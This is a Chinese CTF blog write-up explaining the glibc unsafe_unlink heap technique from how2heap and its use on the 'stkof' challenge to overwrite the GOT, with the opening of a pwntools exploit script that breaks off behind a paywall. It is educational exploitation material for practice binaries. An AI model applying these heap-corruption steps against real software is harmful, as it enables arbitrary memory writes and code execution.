how2heap的unsafe_unlink(包含stkof和wheelofrobots)

最新推荐文章于 2023-05-16 11:11:11 发布
最新推荐文章于 2023-05-16 11:11:11 发布
阅读量230 收藏
点赞数
分类专栏: Pwn 做题记录 how2heap
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/eeeeeight/article/details/115221757
版权

unsafe_unlink

Tags: Pwn, learning experience

例子:

先讲解一下how2heap中给出的例子: 它最终的效果是让全局变量ptr上存储的值变为ptr-0x18, 其unlink过程可以被分解成为如下步骤: (1)寻找堆溢出, (2)伪造chunk, (3)执行unlink

(1)寻找堆溢出就是找一个溢出点之类的漏洞使其修改两个连续chunk中的第二个chunk

(2)伪造chunk, 除了在第一个chunk中布置fake_fd和fake_bk外, 还要在第二个chunk的chunk头改变pre_szie与pre_inuse位, 其布置完成后类似下图:

在这里插入图片描述

(3)执行unlink操作, 拿how2heap里的程序举例子, 它是在向后合并且导致free_chunk变大(即使是fake_free_chunk), 所以它要被从之前所在大小的chunk里取出来, 同时其fd与bk记录的chunk再次链接,注意其顺序位FAKE_FD_bk=FAKE_BK, FAKE_BK_fd=FAKE_FD, 因为FAKE_BK_fd是后赋值且FAKE_FD_bk与其实际上是同一地址都是ptr, 所以最后ptr上记录的值就变为了FAKE_FD即ptr-0x18(可能变量名称和wiki上有些出入, 但是懒得重新画了)

stkof:

题目链接,i64文件啥的

很简单的一道题, 看懂例子差不多就自己能做出来了, 比较蛋疼的是它没有函数来提示功能, 导致我一度以为电脑坏了

保护检查:

在这里插入图片描述
RELRO不是全开, 所以可以尝试修改got表

反汇编分析:

首先在Full函数里存在这明显可利用的堆溢出:
在这里插入图片描述
PS: 该文件所有反汇编生成的函数中栈上的字符数组都默认命名为s, 而也有一个全局指针也默认名为s, 所以建议自己改了全局指针的名称, 免得混淆了

在Add函数中我们发现其申请空间的地址是通过一个全局指针来进行存储的, 所以我们很容易想到利用unlink
在这里插入图片描述

实现思路:

(1)利用Full函数中的堆溢出伪造出可供利用的fake_chunk

(2)unlink操作之后, 由于ptr指向了ptr-0x18的位置所以fread从ptr-0x18开始写入, 由于ptr-0x10是存放chunk1的地址, 所以等一会我们也可以尝试对chunk1进行fread操作

(3)将全局指针上放入got, 然后我们通过Full函数就可以利用fread对其进行改写got表了

注意事项:

在这里插入图片描述

第一个chunk申请完之后会产生一个0x410大小的chunk, 所以unlink操作推荐在自己申请的第二和第三个chunk中进行

exp:

#!/usr/bin/env python
# coding=utf-8
from pwn import *
sh=process('./stkof')
#sh=remote("node3.buuoj.cn",26510)
elf=ELF("./stkof")
context.arch="amd64"
#context.log_level="debug"
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
libc=ELF('./libc.so.6')

global_ptr = 0x0602140
free_plt = 0x400750

def Alloc(size):
    sh.sendline("1")
    sh.sendline(str(size))
    sh.recvuntil("OK\n")

def Full(index, padding):
    sh.sendline("2")
    sh.sendline(str(index))
    sh.sendline(str(len(padding)))
    sh.send(padding)
    sh.recvuntil("OK\n")

def Free(index):
    sh.sendline("3")
    sh.sendline(str(index))

Alloc(0x90
最低0.47元/天 解锁文章
北岛静石
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
how2heap 5.unsafe_unlink
WHOISjxb的博客
04-06 562
64位系统以下各字段均为8字节,32位系统为4字节。 glibc2.26及以上版本有tcache机制。咱目前也不太懂,快刀斩乱麻,glibc2.25的实验在Ubuntu16.04上做,glibc版本信息如下: 5. unsafe_unlink.c 运行结果: 分析: 题外话,观察到,对于同一个可执行文件unsafe_unlink,每次运行打印的地址不同,而每次调试则相同。希望以后理解。 伪...
linux堆溢出学习之unsafe unlink
jmp esp
12-10 3320
示例代码来源:https://github.com/Escapingbug/how2heap/blob/master/unsafe_unlink.c#include <stdio.h> #include <stdlib.h> #include <string.h> #include <stdint.h> uint64_t *chunk0_ptr;int main() { printf("We
Unsafe Unlink:unlink利用
AIwenIPgeolocation的博客
05-16 573
Date:2023年5月12日。
5.unsafe_unlink
06-08 259
源代码  1 #include <stdio.h> 2 #include <stdlib.h> 3 #include <string.h> 4 #include <stdint.h> 5 6 7 uint64_t *chunk0_ptr; 8 9 int main() 10 { 11 ...
unsafe_unlink(详解)
m0_52249553的博客
04-07 284
how2heap调试
堆利用之unsafe unlink
蚁景网安学院
06-24 286
原创稿件征集邮箱:edu@antvsion.comQQ:3200599554黑客与极客相关,互联网安全领域里的热点话题漏洞、技术相关的调查或分析稿件通过并发布还能收获200-800元不等的...
native_heapdump_viewer.py
07-16
使用方法如下: 1.打开Android调试开关(需要userdebug版本) setenforce 0 setprop libc.debug.malloc 1 setprop libc.debug.malloc.options backtrace stop;...对比00.log和01.log,查看内存增长的点
ion_heap.rar_ION_V2 _heap
09-19
ion heap ion heap create for Linux v2.13.6.
mysql tmp_table_size和max_heap_table_size大小配置
01-19
(实际起限制作用的是tmp_table_size和max_heap_table_size的最小值。)如果内存临时表超出了限制,MySQL就会自动地把它转化为基于磁盘的MyISAM表,存储在指定的tmpdir目录下,默认: mysql> show variables like ...
heap 漏洞 unlink
samohyes的博客
06-05 520
看了好久没看懂、、、一知半解,把链接放这里,慢慢看内存管理机制https://jaq.alibaba.com/community/art/show?spm=a313e.7916648.0.0.680125d6KB9x2z&amp;articleid=334漏洞利用http://manyface.github.io/2016/05/19/AndroidHeapUnlinkExploitPractic...
堆利用之unlink
chenzhenyu1983的博客
04-30 568
一 small bin,large bin等的内存结构 未分配的chunk |  pre chunk size  |   size  |F|C|P| |  fd       |         bk         | presize: 前一个块的大小(如果前一个块是空闲的) size:当前块的大小 F标志位:目前还没有用 C标志位:如果当前块已被分配,置1;否则,置0 P标志位:如果前一个块已被...
unlink学习
weixin_45427676的博客
04-14 529
unlink原理 unlink这种利用方式源于glibc堆管理的一种特性,即当free一个chunk时,若该chunk处于双向链表中,则会检测其相邻块是否空闲,若处于空闲状态,则会将该空闲块从双向链表中取出,然后合并,这个取出操作就是unlink。unlink其实就是删除双向链表中的目标结点,这个删除过程本质上是对其前后结点的指针重新赋值,若我们对其指针进行巧妙的设置,则可能控制任意内存地址空间,...
我又pwn啦——理论篇 unlink
m0_64195960的博客
06-20 543
1)定义:在双向链表中取出一个chunk的操作2)使用时间:1、malloc·在恰好大小的large chunk处取chunk时·在比请求大小大的bin中取chunk时2、Free·后向合并,合并物理相邻低物理地址空闲chunk时·前向合并,合并物理相邻高物理地空闲chunk时(top chunk除外)3、malloc_consolidate·后向合并,合并物理相邻低地址空闲chunk时·前向合并,合并物理相邻高地址空闲chunk时(top chunk除外)4、realloc前向扩展,合并物理相邻高地址空闲
2017 insomni'hack——wheelofrobots
04-22 178
64位程序,没开PIE  #unlink #off by one #fastbin attack 程序逻辑 大概分析程序,可以得知,这是一个配置机器人轮子的游戏,机器人一共需要添加 3 个轮子。 程序非常依赖的一个功能是读取整数,该函数 read_int 是读取指定的长度,将其转化为 int 类型的数字。 一共有 6 个轮子可以选择 1 void __fastcall...
2017 insomni'hack wheelofrobots
coco的博客
12-04 224
程序分析 是一个64位程序,没有开启PIE。并且是一个菜单式的程序。 add robot 一共有六个robot可以添加。可以看到,添加一个robot,会在bss端上写入一个指向robot name的指针,in use位。并且每次的选择也是写入bss端上。还有一个count来限制add robot的次数,最多3次。 这里有个漏洞。choice读入的时候能向bss端上读入五个字节。观察bss结构的...
2021羊城杯pwn部分wp
eeeeeight的博客
09-12 6477
前言: 羊城杯的how2heap没做出来, rctf也爆零了, 哎, 颓了 BabyRop: 最基础的栈溢出rop链, 直接贴exp了: from pwn import * #p=process('./BabyRop') p=remote('192.168.41.23', 11000) context.log_level='debug' sh=0x804c029 system=0x80490a0 #gdb.attach(p,'b *0x804926a') p.sendline('a'*0x28+'b'*
2021长城杯pwn部分wp
eeeeeight的博客
09-19 6004
前言: 就, 除了vmpwn都是基础glibc的heap题 king_in_heap_1: delete函数没有把free后的指针置零, 存在uaf, 然后用unsortedbin的fd指向io结构体泄露libc, 然后mallochook上用realloc调整一下, 打onegadget就完事了 #!/usr/bin/env python # coding=utf-8 from pwn import * sh=remote('47.104.175.110',20066) #sh=process('./ki
2021鹤城杯pwn部分wp
eeeeeight的博客
10-09 2055
littleof 白给的ret2libc, 第一个输出泄露canary, 第二个输出泄露libc基址顺便控制一下返回地址再返回去输入, 之后就getshell咯(摊手) #!/usr/bin/env python #coding=utf-8 from pwn import* sh = remote("182.116.62.85", 27056) #sh = process('./littleof') elf = ELF('./littleof') libc = ELF('./libc-2.27.so')
Nov 26, 21在macOS 12.0.1上布置pwn环境
eeeeeight的博客
11-27 1727
前言: 不是让民那桑在mac上做amd架构的题目,我布置环境是为了以后方便pwn arm架构的题目/设备之类的(逃) Pwn environment: lldb && voltron && tmuxinator && pwntools: Because outstanding performance of Plugins in gdb like pwndbg, gef and so on. I choose to install gdb on my M1 Ma
tmp_table_size和'max_heap_table_size参数如何设置
最新发布
05-21
`tmp_table_size` 和 `max_heap_table_size` 是 MySQL 中用来控制临时表大小的参数,分别控制使用内存和磁盘的最大值。 `tmp_table_size` 控制使用内存的最大值,而 `max_heap_table_size` 控制使用内存和磁盘的最大值,如果 `tmp_table_size` 超过了 `max_heap_table_size`,则会使用磁盘进行存储。 通常情况下,这两个参数需要根据实际的业务需求来进行设置。如果系统中经常需要创建临时表,那么可以适当增大这两个参数,以提高系统性能。如果系统中临时表使用较少,那么可以适当减小这两个参数,以节省内存空间。 下面是一些一般性的建议: - 如果服务器有足够的内存,可以考虑将 `tmp_table_size` 和 `max_heap_table_size` 设置为相同的值,以避免在使用 `tmp_table_size` 时出现磁盘操作。 - 如果服务器内存不足,可以适当减小 `tmp_table_size` 和 `max_heap_table_size` 的值,以避免内存不足的情况。 - 如果系统中的临时表比较大,可以增大这两个参数的值,以减少磁盘操作的次数。 - 如果系统中的临时表比较小,可以适当减小这两个参数的值,以节省内存空间。 需要注意的是,`tmp_table_size` 和 `max_heap_table_size` 的值设置过大可能会导致系统性能下降,因为它们会占用大量的内存和磁盘空间。因此,需要根据实际情况进行调整。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值